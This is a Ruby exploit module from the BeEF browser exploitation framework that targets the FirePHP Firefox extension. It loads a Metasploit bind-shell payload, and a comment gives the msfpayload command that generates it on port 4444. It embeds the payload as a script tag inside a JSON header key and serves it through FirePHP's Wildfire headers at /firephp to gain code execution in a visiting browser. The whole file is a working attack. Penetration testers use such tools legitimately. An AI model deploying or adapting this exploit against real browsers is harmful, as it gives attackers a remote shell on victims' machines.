#
# Copyright (c) 2006-2024 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - https://beefproject.com
# See the file 'doc/COPYING' for copying permission
###
# PoC by Wireghoul: http://www.justanotherhacker.com/advisories/jahx132.html
###
class Firephp_code_exec < BeEF::Core::Command
  def pre_send
    rand_str = rand(32**10).to_s(32)

    # load payload.js file
    # generate payload:
    #  msfpayload firefox/shell_bind_tcp LPORT=4444 R > payload.js
    payload = ''
    f = File.open("#{$root_dir}/modules/exploits/firephp/payload.js")
    f.each_line do |line|
      payload << line
    end
    f.close

    # construct exploit+payload HTTP response
    exploit = {
      'RequestHeaders' => {
        '1' => rand(10).to_s,
        '2' => rand(10).to_s,
        '3' => rand(10).to_s,
        '4' => rand(10).to_s,
        '5' => rand(10).to_s,
        '6' => rand(10).to_s,
        '7' => rand(10).to_s,
        '8' => rand(10).to_s,
        '9' => rand(10).to_s,
        "<script>#{payload}<\/SCRIPT>" => rand_str
      }
    }.to_json

    # mount exploit+payload at /firephp
    # @todo use Router class instead of bind_raw()
    BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.bind_raw('200',
                                                                       {
                                                                         'Content-Type' => 'text/html',
                                                                         'X-Wf-Protocol-1' => 'http://meta.wildfirehq.org/Protocol/JsonStream/0.2',
                                                                         'X-Wf-1-Plugin-1' => 'http://meta.firephp.org/Wildfire/Plugin/FirePHP/Library-FirePHPCore/0.3',
                                                                         'X-Wf-1-Structure-1' => 'http://meta.firephp.org/Wildfire/Structure/FirePHP/Dump/0.1',
                                                                         'X-Wf-1-1-1-1' => "#{exploit.length}|#{exploit}|\r\n"
                                                                       },
                                                                       rand_str,   # HTTP body
                                                                       '/firephp', # URI mount point
                                                                       -1)
  end

  def post_execute
    save({ 'result' => @datastore['result'] })
  end
end